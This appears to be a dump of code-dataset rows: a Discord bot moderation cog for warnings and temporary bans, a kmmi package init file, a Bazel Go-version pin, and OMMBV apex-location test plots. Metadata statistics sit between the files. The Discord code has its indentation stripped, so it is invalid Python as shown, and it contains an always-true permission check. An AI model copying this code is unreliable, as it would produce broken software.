embed.add_field(name="__Time stamp__", value="2 hours")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
db1.remove(Warn.member_id == member.id)
await asyncio.sleep(7200)
await ctx.guild.unban(member)
if len(lig) == 0:
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Temp ban**")
embed.add_field(name="__Moderator__", value=f"-{self.bot.user.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-Reached 3 warnings: {' '.join(reason)}")
embed.add_field(name="__Log channel__",
value=f"-To setup the log channel do ?logchannel [channel mention] or just type ?help to know more about it.")
embed.add_field(name="__Time stamp__", value="2 hours")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
db1.remove(Warn.member_id == member.id)
await asyncio.sleep(7200)
await ctx.guild.unban(member)
elif len(li) < 3:
db1.insert({'member_id': member.id, 'guild_id': ctx.guild.id, 'reason': reason,
'moderator': f"{ctx.message.author.name}#{ctx.message.author.discriminator}"})
li1 = db1.search(Warn.member_id == member.id)
if len(lig) == 0:
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Warn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li1)}")
embed.add_field(name="__Log channel__",
value=f"-To setup the log channel do ?logchannel [channel mention] or just type ?help to know more about it.")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
if len(lig) != 0:
for i in lig:
global channel1
channel_id1 = i['channel_id']
channel1 = self.bot.get_channel(int(channel_id1))
embed1 = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed1.add_field(name="__Type__", value="**Warn**")
embed1.add_field(name="__Moderator__", value=f"{ctx.message.author.mention}")
embed1.add_field(name="__Member__", value=f"{member.mention}")
embed1.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed1.add_field(name="__Warnings__", value=f"{len(li1)}")
embed1.add_field(name="__Log channel__",
value=f"{channel1.mention}")
embed1.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed1.set_thumbnail(url=ctx.guild.icon_url)
await channel1.send(embed=embed1)
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Warn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li1)}")
embed.add_field(name="__Log channel__",
value=f"-{channel1.mention}")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
if member.id == ctx.message.author.id or member.id == self.bot.user.id:
msg5 = await ctx.message.channel.send("🚫, you can't warn this user!")
await msg5.delete(delay=5)
@commands.command()
@commands.cooldown(1, 15, commands.BucketType.user)
@commands.has_permissions(ban_members=True)
async def dewarn(self, ctx, member: discord.Member, *reason):
db1 = TinyDB('db/moderation/warn.json')
db = TinyDB('db/moderation/logchannel.json')
Log = Query()
Warn = Query()
li = db1.search(Warn.member_id == member.id)
lig = db.search(Log.guild_id == ctx.guild.id)
if member.guild_permissions.administrator:
msg1 = await ctx.message.channel.send("🚫, you can't dewarn a moderator!")
await msg1.delete(delay=5)
if member.guild_permissions.administrator == False:
if member.id != ctx.message.author.id or member.id != self.bot.user.id:
if len(li) == 0:
await ctx.message.channel.send("🚫, This member already has 0 warnings!")
if len(li) != 0:
if len(lig) != 0:
for i in lig:
global channel1
channel_id1 = i['channel_id']
channel1 = self.bot.get_channel(int(channel_id1))
embed = discord.Embed(title="__Moderation__", colour=0xb7e884, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Dewarn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li)}")
embed.add_field(name="__Log channel__",
value=f"-{channel1.mention}")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
await channel1.send(embed=embed)
embed = discord.Embed(title="__Moderation__", colour=0xb7e884, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Dewarn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li)}")
embed.add_field(name="__Log channel__",
value=f"-{channel1.mention}")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
db1.remove(Warn.member_id == member.id)
await ctx.message.delete()
await msg.delete(15)
if len(lig) == 0:
embed = discord.Embed(title="__Moderation__", colour=0xb7e884, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Dewarn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li)}")
embed.add_field(name="__Log channel__",
value=f"-To setup the log channel do ?logchannel [channel mention] or just type ?help to know more about it.")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
db1.remove(Warn.member_id == member.id)
await ctx.message.delete()
await msg.delete(15)
if member.id == ctx.message.author.id or member.id == self.bot.user.id:
msg5 = await ctx.message.channel.send("🚫, you can't dewarn this user!")
await msg5.delete(delay=5)
@commands.command()
async def warnings(self, ctx, member: discord.Member = None):
db1 = TinyDB('db/moderation/warn.json')
if member != None:
Warn = Query()
li = db1.search(Warn.member_id == member.id)
if len(li) == 0:
msg = await ctx.channel.send(f"{member.mention}, has no warnings! all clear sir.")
await msg.delete(delay=5)
if len(li) == 1:
for i in li:
embed = discord.Embed(title="__Warnings__", description=f"Those are {member} warnings.",
colour=0xedd500, timestamp=datetime.utcnow())
embed.add_field(name="Only one warning", value=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""")
embed.add_field(name="__Notice__", value="To remove all the warnings do ?dewarn @member")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg1 = await ctx.channel.send(embed=embed)
await msg1.delete(delay=15)
if len(li) > 1:
embed = discord.Embed(title="__Warnings__", description=f"Those are {member} warnings.",
colour=0xedd500,
timestamp=datetime.utcnow())
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg2 = await ctx.channel.send(embed=embed)
await msg2.delete(delay=30)
for i in li:
embed1 = discord.Embed(title="Warning", description=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""", colour=0xedd500, timestamp=datetime.utcnow())
embed1.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed1.set_thumbnail(url=ctx.guild.icon_url)
msg3 = await ctx.channel.send(embed=embed1)
await msg3.delete(delay=30)
if member == None:
Warn = Query()
li = db1.search(Warn.member_id == ctx.message.author.id)
if len(li) == 0:
msg = await ctx.channel.send(f"You have no warnings! all clear sir.")
await msg.delete(delay=5)
if len(li) == 1:
for i in li:
embed = discord.Embed(title="__Warnings__", description=f"Those are {ctx.message.author} warnings.",
colour=0xedd500, timestamp=datetime.utcnow())
embed.add_field(name="Only one warning", value=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""")
embed.add_field(name="__Notice__", value="To remove all the warnings do ?dewarn @member")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg1 = await ctx.channel.send(embed=embed)
await msg1.delete(delay=15)
if len(li) > 1:
embed = discord.Embed(title="__Warnings__", description=f"Those are {ctx.message.author} warnings.",
colour=0xedd500,
timestamp=datetime.utcnow())
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg2 = await ctx.channel.send(embed=embed)
await msg2.delete(delay=30)
for i in li:
embed1 = discord.Embed(title="Warning", description=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""", colour=0xedd500, timestamp=datetime.utcnow())
embed1.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed1.set_thumbnail(url=ctx.guild.icon_url)
msg3 = await ctx.channel.send(embed=embed1)
await msg3.delete(delay=30)
@warn.error
async def _warn(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
msg1 = await ctx.send('<:stop:587970807909842944> Missing requirement!')
await msg1.delete(delay=5)
if isinstance(error, commands.MissingRole):
msg = await ctx.send('<:stop:587970807909842944> Ops! you can not use that command!')
await msg.delete(delay=5)
if isinstance(error, commands.BadArgument):
msg2 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg2.delete(delay=5)
if isinstance(error, commands.CommandInvokeError):
msg4 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg4.delete(delay=5)
if isinstance(error, commands.CommandOnCooldown):
msg9 = 'This command is ratelimited, please try again in {:.2f}seconds'.format(error.retry_after)
msg6 = await ctx.send(msg9)
await msg6.delete(delay=5)
if isinstance(error, commands.MissingPermissions):
msg1 = await ctx.send('<:stop:587970807909842944> Missing permission!')
await msg1.delete(delay=5)
@dewarn.error
async def _dewarn(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
msg1 = await ctx.send('<:stop:587970807909842944> Missing requirement!')
await msg1.delete(delay=5)
if isinstance(error, commands.MissingRole):
msg = await ctx.send('<:stop:587970807909842944> Ops! you can not use that command!')
await msg.delete(delay=5)
if isinstance(error, commands.BadArgument):
msg2 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg2.delete(delay=5)
if isinstance(error, commands.CommandOnCooldown):
msg9 = 'This command is ratelimited, please try again in {:.2f}seconds'.format(error.retry_after)
msg6 = await ctx.send(msg9)
await msg6.delete(delay=5)
if isinstance(error, commands.MissingPermissions):
msg1 = await ctx.send('<:stop:587970807909842944> Missing permission!')
await msg1.delete(delay=5)
@warnings.error
async def _warnings(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
msg1 = await ctx.send('<:stop:587970807909842944> Missing requirement!')
await msg1.delete(delay=5)
if isinstance(error, commands.MissingRole):
msg = await ctx.send('<:stop:587970807909842944> Ops! you can not use that command!')
await msg.delete(delay=5)
if isinstance(error, commands.BadArgument):
msg2 = await ctx.send(
'<:stop:587970807909842944> Something is wrong, try again!')
await msg2.delete(delay=5)
if isinstance(error, commands.CommandOnCooldown):
msg9 = 'This command is ratelimited, please try again in {:.2f}seconds'.format(error.retry_after)
msg6 = await ctx.send(msg9)
await msg6.delete(delay=5)
if isinstance(error, commands.MissingPermissions):
msg1 = await ctx.send('<:stop:587970807909842944> Missing permission!')
await msg1.delete(delay=5)
def setup(bot):
bot.add_cog(Warninggsystem(bot))
| 60.528571 | 151 | 0.540618 | 2,306 | 21,185 | 4.772333 | 0.076323 | 0.042163 | 0.063244 | 0.080327 | 0.948114 | 0.936302 | 0.919219 | 0.919219 | 0.909859 | 0.88696 | 0 | 0.035451 | 0.33958 | 21,185 | 349 | 152 | 60.702006 | 0.750768 | 0 | 0 | 0.839009 | 0 | 0.009288 | 0.197255 | 0.036955 | 0 | 0 | 0.005759 | 0 | 0 | 1 | 0.006192 | false | 0 | 0.021672 | 0 | 0.03096 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7343edd9eb275f2d2a7aa0544406c2edfd333ffd | 285 | py | Python | kmmi/heuristics/__init__.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | kmmi/heuristics/__init__.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | kmmi/heuristics/__init__.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | from kmmi.heuristics.initialize import *
from kmmi.heuristics.neighborhood_search import *
from kmmi.heuristics.neighborhood_change import *
from kmmi.heuristics.utils import *
from kmmi.heuristics.bvns import *
from kmmi.heuristics.ovns import *
from kmmi.heuristics.ovns_fs import *
| 35.625 | 49 | 0.82807 | 38 | 285 | 6.131579 | 0.315789 | 0.240343 | 0.540773 | 0.618026 | 0.549356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098246 | 285 | 7 | 50 | 40.714286 | 0.906615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7dfd393b6a205042a3a797aea37e0878c8b5504e | 110 | bzl | Python | third_party/golang/revision.bzl | EdSchouten/bazel-toolchains | 82f7462fea3630d702d73ccf2f3e38e34941977d | [
"Apache-2.0"
] | null | null | null | third_party/golang/revision.bzl | EdSchouten/bazel-toolchains | 82f7462fea3630d702d73ccf2f3e38e34941977d | [
"Apache-2.0"
] | null | null | null | third_party/golang/revision.bzl | EdSchouten/bazel-toolchains | 82f7462fea3630d702d73ccf2f3e38e34941977d | [
"Apache-2.0"
] | null | null | null | GOLANG_REVISION = "1.11.1"
GOLANG_SHA256 = "2871270d8ff0c8c69f161aaae42f9f28739855ff5c5204752a8d92a1c9f63993"
| 36.666667 | 82 | 0.872727 | 8 | 110 | 11.75 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.490385 | 0.054545 | 110 | 2 | 83 | 55 | 0.413462 | 0 | 0 | 0 | 0 | 0 | 0.636364 | 0.581818 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b4008321f5ae104c1aa54217619e95ad8fc8e3e3 | 31,893 | py | Python | OMMBV/tests/test_apex.py | jklenzing/pysatMagVect | fd7c53e1277ce732edd79e37e825a7060d3067c7 | [
"BSD-3-Clause"
] | null | null | null | OMMBV/tests/test_apex.py | jklenzing/pysatMagVect | fd7c53e1277ce732edd79e37e825a7060d3067c7 | [
"BSD-3-Clause"
] | null | null | null | OMMBV/tests/test_apex.py | jklenzing/pysatMagVect | fd7c53e1277ce732edd79e37e825a7060d3067c7 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import numpy as np
import matplotlib.pyplot as plt
import pandas as pds
import OMMBV
import pysat
from OMMBV.tests.test_core import gen_data_fixed_alt, gen_trace_data_fixed_alt
from OMMBV.tests.test_core import gen_plot_grid_fixed_alt
from OMMBV.tests.test_core import dview, dc
class TestMaxApexHeight():
def test_plot_apex_heights(self):
"""Check meridional vector along max in apex height gradient"""
date = pysat.datetime(2010, 1, 1)
delta = 1.
ecef_x, ecef_y, ecef_z = OMMBV.geodetic_to_ecef([0.], [320.], [550.])
# get basis vectors
zx, zy, zz, _, _, _, mx, my, mz = OMMBV.calculate_mag_drift_unit_vectors_ecef(ecef_x, ecef_y, ecef_z,
[date], ecef_input=True)
# get apex height for step along meridional directions, then around that direction
_, _, _, _, _, nominal_max = OMMBV.apex_location_info(ecef_x + delta * mx,
ecef_y + delta * my,
ecef_z + delta * mz,
[date],
ecef_input=True,
return_geodetic=True)
steps = (np.arange(101) - 50.) * delta / 10000.
output_max = []
for step in steps:
del_x = delta * mx + step * zx
del_y = delta * my + step * zy
del_z = delta * mz + step * zz
norm = np.sqrt(del_x ** 2 + del_y ** 2 + del_z ** 2)
del_x /= norm
del_y /= norm
del_z /= norm
_, _, _, _, _, loop_h = OMMBV.apex_location_info(ecef_x + del_x,
ecef_y + del_y,
ecef_z + del_z,
[date],
ecef_input=True,
return_geodetic=True)
output_max.append(loop_h)
try:
plt.figure()
plt.plot(steps, output_max)
plt.plot([0], nominal_max, color='r', marker='o', markersize=12)
plt.ylabel('Apex Height (km)')
plt.xlabel('Distance along Zonal Direction (km)')
plt.savefig('comparison_apex_heights_and_meridional.pdf')
plt.close()
except:
pass
# make sure meridional direction is correct
assert np.all(np.max(output_max) == nominal_max)
class TestApex():
def __init__(self):
# placeholder for data management features
self.inst = pysat.Instrument('pysat', 'testing')
self.inst.yr = 2010.
self.inst.doy = 1.
self.dview = dview
self.dc = dc
return
def test_apex_info_accuracy(self):
"""Characterize performance of apex_location_info as fine_step_size varied"""
lats, longs, alts = gen_trace_data_fixed_alt(550.)
ecf_x, ecf_y, ecf_z = OMMBV.geodetic_to_ecef(lats,
longs,
alts)
# step size to be tried
fine_steps_goal = np.array([25.6, 12.8, 6.4, 3.2, 1.6, 0.8, 0.4, 0.2,
0.1, 0.05, .025, .0125, .00625, .003125,
.0015625, .00078125, .000390625, .0001953125,
.0001953125 / 2., .0001953125 / 4., .0001953125 / 8.,
.0001953125 / 16., .0001953125 / 32., .0001953125 / 64.,
.0001953125 / 128., .0001953125 / 256., .0001953125 / 512.,
.0001953125 / 1024., .0001953125 / 2048., .0001953125 / 4096.])
date = datetime.datetime(2000, 1, 1)
dx = []
dy = []
dz = []
dh = []
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for lat, lon, alt in zip(lats, longs, alts):
for steps in fine_steps_goal:
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [lat],
[lon], [alt], [date], fine_step_size=steps,
return_geodetic=True))
out = []
for steps in fine_steps_goal:
# collect output
x, y, z, _, _, apex_height = pending.pop(0).get()
pt = [x[0], y[0], z[0], apex_height[0]]
out.append(pt)
final_pt = pds.DataFrame(out, columns=['x', 'y', 'z', 'h'])
dx.append(np.abs(final_pt.loc[1:, 'x'].values - final_pt.loc[:, 'x'].values[:-1]))
dy.append(np.abs(final_pt.loc[1:, 'y'].values - final_pt.loc[:, 'y'].values[:-1]))
dz.append(np.abs(final_pt.loc[1:, 'z'].values - final_pt.loc[:, 'z'].values[:-1]))
dh.append(np.abs(final_pt.loc[1:, 'h'].values - final_pt.loc[:, 'h'].values[:-1]))
else:
for lat, lon, alt in zip(lats, longs, alts):
out = []
for steps in fine_steps_goal:
x, y, z, _, _, apex_height = OMMBV.apex_location_info([lat], [lon], [alt], [date],
fine_step_size=steps,
return_geodetic=True)
pt = [x[0], y[0], z[0], apex_height[0]]
out.append(pt)
final_pt = pds.DataFrame(out, columns=['x', 'y', 'z', 'h'])
dx.append(np.abs(final_pt.loc[1:, 'x'].values - final_pt.loc[:, 'x'].values[:-1]))
dy.append(np.abs(final_pt.loc[1:, 'y'].values - final_pt.loc[:, 'y'].values[:-1]))
dz.append(np.abs(final_pt.loc[1:, 'z'].values - final_pt.loc[:, 'z'].values[:-1]))
dh.append(np.abs(final_pt.loc[1:, 'h'].values - final_pt.loc[:, 'h'].values[:-1]))
dx = pds.DataFrame(dx)
dy = pds.DataFrame(dy)
dz = pds.DataFrame(dz)
dh = pds.DataFrame(dh)
try:
plt.figure()
yerrx = np.nanstd(np.log10(dx), axis=0)
yerry = np.nanstd(np.log10(dy), axis=0)
yerrz = np.nanstd(np.log10(dz), axis=0)
yerrh = np.nanstd(np.log10(dh), axis=0)
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dx.mean(axis=0)),
yerr=yerrx,
label='x')
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dy.mean(axis=0)),
yerr=yerry,
label='y')
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dz.mean(axis=0)),
yerr=yerrz,
label='z')
plt.errorbar(np.log10(fine_steps_goal[1:]), np.log10(dh.mean(axis=0)),
yerr=yerrh,
label='h')
plt.xlabel('Log Step Size (km)')
plt.ylabel('Change in Apex Position (km)')
plt.title("Change in Field Apex Position vs Fine Step Size")
plt.legend()
plt.tight_layout()
plt.savefig('apex_location_vs_step_size.pdf')
plt.close()
except:
pass
def test_apex_plots(self):
"""Plot basic apex parameters"""
import matplotlib.pyplot as plt
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(120.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_lat = np.zeros((len(p_lats), len(p_longs) + 1))
apex_lon = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print ('collecting ', i, p_lat)
# collect output
x, y, z, olat, olon, oalt = pending.pop(0).get()
apex_lat[i, :-1] = olat
apex_lon[i, :-1] = olon
apex_alt[i, :-1] = oalt
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
x, y, z, olat, olon, oalt = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
return_geodetic=True)
apex_lat[i, :-1] = olat
apex_lon[i, :-1] = olon
apex_alt[i, :-1] = oalt
# calculate difference between apex longitude and original longitude
# values for apex long are -180 to 180, shift to 0 to 360
# process degrees a bit to make the degree difference the most meaningful (close to 0)
idx, idy, = np.where(apex_lon < 0.)
apex_lon[idx, idy] += 360.
idx, idy, = np.where(apex_lon >= 360.)
apex_lon[idx, idy] -= 360.
apex_lon[:, :-1] -= p_longs
idx, idy, = np.where(apex_lon > 180.)
apex_lon[idx, idy] -= 360.
idx, idy, = np.where(apex_lon <= -180.)
apex_lon[idx, idy] += 360.
# account for periodicity
apex_lat[:, -1] = apex_lat[:, 0]
apex_lon[:, -1] = apex_lon[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-25', '-12.5', '0', '12.5', '25']
try:
fig = plt.figure()
plt.imshow(apex_lat, origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Apex Latitude (Degrees) at 120 km')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_lat.pdf')
plt.close()
fig = plt.figure()
plt.imshow(apex_lon, origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Apex Longitude Difference (Degrees) at 120 km')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_lon.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude (km) at 120 km')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_alt.pdf')
plt.close()
except:
pass
def test_apex_diff_plots(self):
"""Uncertainty of apex location determination at default fine_step_size"""
import matplotlib.pyplot as plt
# on_travis = os.environ.get('ONTRAVIS') == 'True'
p_lats, p_longs, p_alts = gen_plot_grid_fixed_alt(550.)
# data returned are the locations along each direction
# the full range of points obtained by iterating over all
# recasting alts into a more convenient form for later calculation
p_alts = [p_alts[0]] * len(p_longs)
# set the date
date = datetime.datetime(2000, 1, 1)
# memory for results
apex_lat = np.zeros((len(p_lats), len(p_longs) + 1))
apex_lon = np.zeros((len(p_lats), len(p_longs) + 1))
apex_alt = np.zeros((len(p_lats), len(p_longs) + 1))
apex_z = np.zeros((len(p_lats), len(p_longs) + 1))
norm_alt = np.zeros((len(p_lats), len(p_longs) + 1))
# set up multi
if self.dc is not None:
import itertools
targets = itertools.cycle(dc.ids)
pending = []
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
# iterate through target cyclicly and run commands
dview.targets = next(targets)
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=1.E-5,
return_geodetic=True))
pending.append(dview.apply_async(OMMBV.apex_location_info, [p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=5.E-6,
return_geodetic=True))
for i, p_lat in enumerate(p_lats):
print ('collecting ', i, p_lat)
# collect output
x, y, z, _, _, h = pending.pop(0).get()
x2, y2, z2, _, _, h2 = pending.pop(0).get()
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
else:
# single processor case
for i, p_lat in enumerate(p_lats):
print (i, p_lat)
x, y, z, _, _, h = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=1.E-5, return_geodetic=True)
x2, y2, z2, _, _, h2 = OMMBV.apex_location_info([p_lat] * len(p_longs), p_longs,
p_alts, [date] * len(p_longs),
fine_step_size=5.E-6, return_geodetic=True)
norm_alt[i, :-1] = h
apex_lat[i, :-1] = np.abs(x2 - x)
apex_lon[i, :-1] = np.abs(y2 - y)
apex_z[i, :-1] = np.abs(z2 - z)
apex_alt[i, :-1] = np.abs(h2 - h)
# account for periodicity
apex_lat[:, -1] = apex_lat[:, 0]
apex_lon[:, -1] = apex_lon[:, 0]
apex_z[:, -1] = apex_z[:, 0]
apex_alt[:, -1] = apex_alt[:, 0]
norm_alt[:, -1] = norm_alt[:, 0]
idx, idy, = np.where(apex_lat > 10.)
print('Locations with large apex x (ECEF) location differences.', p_lats[idx], p_longs[idx])
ytickarr = np.array([0, 0.25, 0.5, 0.75, 1]) * (len(p_lats) - 1)
xtickarr = np.array([0, 0.2, 0.4, 0.6, 0.8, 1]) * len(p_longs)
ytickvals = ['-50', '-25', '0', '25', '50']
try:
fig = plt.figure()
plt.imshow(np.log10(apex_lat), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-x km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_x.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_lon), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-y km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_y.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_z), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Location Difference (ECEF-z km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_loc_diff_z.pdf')
plt.close()
fig = plt.figure()
plt.imshow(np.log10(apex_alt / norm_alt), origin='lower')
plt.colorbar()
plt.yticks(ytickarr, ytickvals)
plt.xticks(xtickarr, ['0', '72', '144', '216', '288', '360'])
plt.title('Log Apex Altitude Normalized Difference (km)')
plt.xlabel('Geodetic Longitude (Degrees)')
plt.ylabel('Geodetic Latitude (Degrees)')
plt.savefig('apex_norm_loc_diff_h.pdf')
plt.close()
